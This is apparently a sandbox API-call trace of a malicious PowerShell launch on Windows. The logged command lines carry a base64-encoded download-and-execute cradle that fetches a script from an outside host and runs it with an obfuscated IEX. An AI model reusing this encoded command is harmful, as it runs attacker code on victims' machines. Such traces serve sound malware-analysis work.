	[0328.738] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.738] SetErrorMode (uMode=0x1) returned 0x1
	[0328.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.738] SetErrorMode (uMode=0x1) returned 0x1
	[0328.738] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.739] SetErrorMode (uMode=0x1) returned 0x1
	[0328.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.739] SetErrorMode (uMode=0x1) returned 0x1
	[0328.739] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.739] SetErrorMode (uMode=0x1) returned 0x1
	[0328.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.740] SetErrorMode (uMode=0x1) returned 0x1
	[0328.740] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.740] SetErrorMode (uMode=0x1) returned 0x1
	[0328.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.740] SetErrorMode (uMode=0x1) returned 0x1
	[0328.741] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.741] SetErrorMode (uMode=0x1) returned 0x1
	[0328.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.741] SetErrorMode (uMode=0x1) returned 0x1
	[0328.741] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.741] SetErrorMode (uMode=0x1) returned 0x1
	[0328.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.742] SetErrorMode (uMode=0x1) returned 0x1
	[0328.742] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.742] SetErrorMode (uMode=0x1) returned 0x1
	[0328.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.742] SetErrorMode (uMode=0x1) returned 0x1
	[0328.743] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.743] SetErrorMode (uMode=0x1) returned 0x1
	[0328.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.743] SetErrorMode (uMode=0x1) returned 0x1
	[0328.743] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.743] SetErrorMode (uMode=0x1) returned 0x1
	[0328.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0328.744] SetErrorMode (uMode=0x1) returned 0x1
	[0328.744] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.744] SetErrorMode (uMode=0x1) returned 0x1
	[0328.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0328.744] SetErrorMode (uMode=0x1) returned 0x1
	[0328.745] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.745] SetErrorMode (uMode=0x1) returned 0x1
	[0328.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0328.745] SetErrorMode (uMode=0x1) returned 0x1
	[0328.745] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.746] SetErrorMode (uMode=0x1) returned 0x1
	[0328.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0328.746] SetErrorMode (uMode=0x1) returned 0x1
	[0328.746] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.746] SetErrorMode (uMode=0x1) returned 0x1
	[0328.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0328.747] SetErrorMode (uMode=0x1) returned 0x1
	[0328.747] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x2b5150
	[0328.748] FindNextFileW (in: hFindFile=0x2b5150, lpFindFileData=0x1c83dc10 | out: lpFindFileData=0x1c83dc10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0328.748] FindClose (in: hFindFile=0x2b5150 | out: hFindFile=0x2b5150) returned 1
	[0328.748] SetErrorMode (uMode=0x1) returned 0x1
	[0328.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c83dd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0328.749] SetErrorMode (uMode=0x1) returned 0x1
	[0328.749] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c83df30 | out: lpFileInformation=0x1c83df30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0328.749] SetErrorMode (uMode=0x1) returned 0x1
	[0328.750] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0328.750] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0328.750] CoTaskMemFree (pv=0x246bd0) 
	[0329.392] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0329.392] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.392] CoTaskMemFree (pv=0x246bd0) 
	[0329.395] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0329.395] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.395] CoTaskMemFree (pv=0x246bd0) 
	[0329.920] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0329.920] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.920] CoTaskMemFree (pv=0x246bd0) 
	[0329.933] CoTaskMemAlloc (cb=0x3b) returned 0x2fbac0
	[0330.573] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c83e118, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c83e118) returned 0x4550
	[0330.575] CoTaskMemFree (pv=0x2fbac0) 
	[0330.577] GetConsoleWindow () returned 0x10200
	[0330.584] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0330.584] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0330.584] CoTaskMemFree (pv=0x246bd0) 
	[0330.585] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0330.586] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0330.586] CoTaskMemFree (pv=0x246bd0) 
	[0330.591] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0330.591] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0330.591] CoTaskMemFree (pv=0x246bd0) 
	[0330.594] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c83e160 | out: pNumArgs=0x1c83e160) returned 0x1b854670*=""
	[0330.595] lstrlenW (lpString="-EncodedCommand") returned 15
	[0330.596] CoTaskMemAlloc (cb=0x22) returned 0x1b872e60
	[0330.596] RtlMoveMemory (in: Destination=0x1b872e60, Source=0x1b854692, Length=0x20 | out: Destination=0x1b872e60) 
	[0330.596] CoTaskMemFree (pv=0x1b872e60) 
	[0330.596] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0330.596] CoTaskMemAlloc (cb=0x2f4) returned 0x27dfb0
	[0330.596] RtlMoveMemory (in: Destination=0x27dfb0, Source=0x1b8546b2, Length=0x2f2 | out: Destination=0x27dfb0) 
	[0330.596] CoTaskMemFree (pv=0x27dfb0) 
	[0330.597] LocalFree (hMem=0x1b854670) returned 0x0
	[0331.145] CoTaskMemAlloc (cb=0x804) returned 0x1b86c580
	[0331.145] GetConsoleTitleW (in: lpConsoleTitle=0x1b86c580, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0331.146] CoTaskMemFree (pv=0x1b86c580) 
	[0331.794] CoTaskMemAlloc (cb=0x38e) returned 0x1b854670
	[0331.794] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c83e0c0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2f1b898 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2f1b898*(hProcess=0x348, hThread=0x35c, dwProcessId=0xf5c, dwThreadId=0xf60)) returned 1
	[0331.798] CoTaskMemFree (pv=0x1b854670) 
	[0331.799] CloseHandle (hObject=0x35c) returned 1
	[0331.799] CoTaskMemAlloc (cb=0x3b) returned 0x2fbac0
	[0331.799] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c83e168, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c83e168) returned 0x4550
	[0331.799] CoTaskMemFree (pv=0x2fbac0) 
	[0331.802] GetCurrentProcess () returned 0xffffffffffffffff
	[0331.802] GetCurrentProcess () returned 0xffffffffffffffff
	[0331.803] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x348, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c83e248, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c83e248*=0x35c) returned 1

Process:
	id = "12"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x30325000"
	os_pid = "0x920"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 70
	os_tid = 0x924

	[0252.991] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0254.948] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0254.948] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0254.948] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0254.948] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0258.750] GetVersionExW (in: lpVersionInformation=0x12da60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12da60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0258.752] GetVersionExW (in: lpVersionInformation=0x12da60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12da60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0258.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.169] GetVersionExW (in: lpVersionInformation=0x12d7d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12d7d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0259.170] SetErrorMode (uMode=0x1) returned 0x1
